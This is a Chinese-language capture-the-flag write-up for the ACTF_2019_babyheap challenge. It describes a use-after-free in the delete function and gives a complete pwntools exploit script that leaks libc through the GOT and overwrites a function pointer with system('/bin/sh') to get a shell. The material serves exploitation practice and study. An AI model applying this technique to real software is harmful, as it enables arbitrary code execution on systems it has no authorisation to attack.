0%

ACTF_2019_babyheap

buuoj刷pwn题之ACTF_2019_babyheap

PIE没开,got表不可改
checksec

有add,delete,show功能,libc为2.27(有tcache)

system函数有了,都不用leak了:

menu

delete处free后指针没置为NULL

delete

结合show函数,uaf

show

node的格式:

node

直接uaf,改func成system,mem为指向'/bin/sh'字符串的指针

因为node的格式,覆盖func,也要覆盖mem,还是得先leak出,'/bin/sh'的位置

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
#coding=utf8

from PwnContext import *

context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context.log_level = 'debug'
# functions for quick script
s = lambda data :ctx.send(str(data)) #in case that data is an int
sa = lambda delim,data :ctx.sendafter(str(delim), str(data))
sl = lambda data :ctx.sendline(str(data))
sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data))
r = lambda numb=4096,timeout=2:ctx.recv(numb, timeout=timeout)
ru = lambda delims, drop=True :ctx.recvuntil(delims, drop)
irt = lambda :ctx.interactive()
rs = lambda *args, **kwargs :ctx.start(*args, **kwargs)
dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs)
# misc functions
uu32 = lambda data :u32(data.ljust(4, '\x00'))
uu64 = lambda data :u64(data.ljust(8, '\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))

ctx.binary = './ACTF_2019_babyheap'
ctx.remote = ('0.0.0.0', 0)
ctx.remote_libc = '../../libc/libc-2.27.so'
ctx.debug_remote_libc = True

rs()
# rs('remote')
# print(ctx.libc.path)

def add(size, content):
sla('choice: ', '1')
sla('size: \n', str(size))
sa('content: \n', content)


def free(index):
sla('choice: ', '2')
sla('index: \n', str(index))


def show(index):
sla('choice: ', '3')
sla('index: \n', str(index))


add(0x20, 'aaa') # 0
add(0x20, 'aaa') # 1
add(0x20, 'aaa') # 2

free(0)
free(1)

# leak
add(0x10, p64(ctx.binary.got['system'])) # 3
show(0)

ru("Content is '")
system_addr = uu64(ru("'\n"))
libc_base = system_addr - ctx.libc.sym['system']
str_bin_sh = libc_base + ctx.libc.search('/bin/sh').next()

leak('system', system_addr)
leak('libc_base', libc_base)
leak('str_bin_sh', str_bin_sh)


free(3)
add(0x10, p64(str_bin_sh) + p64(ctx.binary.plt['system']))

# pwn!
show(0)

#dbg()

irt()